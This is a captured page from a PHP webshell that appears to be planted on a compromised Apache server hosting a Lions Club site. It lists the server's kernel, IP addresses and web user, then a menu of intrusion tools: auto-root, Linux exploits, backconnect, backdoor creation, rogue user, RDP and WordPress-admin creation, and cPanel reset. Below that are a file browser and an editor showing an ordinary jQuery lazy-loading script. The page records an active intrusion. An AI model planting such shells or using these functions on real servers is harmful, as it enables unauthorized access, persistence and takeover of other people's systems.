Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 18.218.137.145
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
lionsclub /
assets /
dashboard /
js /
scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
plugins
[ DIR ]
drwxr-xr-x
.DS_Store
8
KB
-rw-r--r--
ajax.js
750
B
-rw-r--r--
app.js
3.85
KB
-rw-r--r--
config.lazyload.js
4.28
KB
-rw-r--r--
data.json
2.83
KB
-rw-r--r--
palette.js
9.47
KB
-rw-r--r--
ui-device.js
524
B
-rw-r--r--
ui-form.js
329
B
-rw-r--r--
ui-include.js
1.24
KB
-rw-r--r--
ui-jp.js
531
B
-rw-r--r--
ui-load.js
2.13
KB
-rw-r--r--
ui-nav.js
353
B
-rw-r--r--
ui-screenfull.js
0
B
-rw-r--r--
ui-scroll-to.js
604
B
-rw-r--r--
ui-toggle-class.js
913
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ui-load.js
/** * 0.1.0 * Deferred load js/css file, used for ui-jq.js and Lazy Loading. * * @ flatfull.com All Rights Reserved. * Author url: http://themeforest.net/user/flatfull */ var uiLoad = uiLoad || {}; (function($, $document, uiLoad) { "use strict"; var loaded = [], promise = false, deferred = $.Deferred(); /** * Chain loads the given sources * @param srcs array, script or css * @returns {*} Promise that will be resolved once the sources has been loaded. */ uiLoad.load = function (srcs) { srcs = $.isArray(srcs) ? srcs : srcs.split(/\s+/); if(!promise){ promise = deferred.promise(); } $.each(srcs, function(index, src) { promise = promise.then( function(){ return src.indexOf('.css') >=0 ? loadCSS(src) : loadScript(src); } ); }); deferred.resolve(); return promise; }; /** * Dynamically loads the given script * @param src The url of the script to load dynamically * @returns {*} Promise that will be resolved once the script has been loaded. */ var loadScript = function (src) { if(loaded[src]) return loaded[src].promise(); var deferred = $.Deferred(); var script = $document.createElement('script'); script.src = src; script.onload = function (e) { deferred.resolve(e); }; script.onerror = function (e) { deferred.reject(e); }; $document.body.appendChild(script); loaded[src] = deferred; return deferred.promise(); }; /** * Dynamically loads the given CSS file * @param href The url of the CSS to load dynamically * @returns {*} Promise that will be resolved once the CSS file has been loaded. */ var loadCSS = function (href) { if(loaded[href]) return loaded[href].promise(); var deferred = $.Deferred(); var style = $document.createElement('link'); style.rel = 'stylesheet'; style.type = 'text/css'; style.href = href; style.onload = function (e) { deferred.resolve(e); }; style.onerror = function (e) { deferred.reject(e); }; $document.head.appendChild(style); loaded[href] = deferred; return deferred.promise(); } })(jQuery, document, uiLoad);
Close